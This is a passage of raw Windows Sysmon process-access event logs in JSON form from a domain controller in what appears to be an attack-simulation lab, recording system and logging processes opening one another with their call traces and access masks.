C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.559","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7560,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.559\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.559","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7561,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.559\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.559","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7562,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.559\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.559","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7563,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.559\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.559","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7564,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.559\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.559","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7565,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.559\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.559","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7566,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.559\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-00107B3A0B00}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:00.559","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-00107B3A0B00}","TargetProcessId":"3468","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7567,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:00.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed 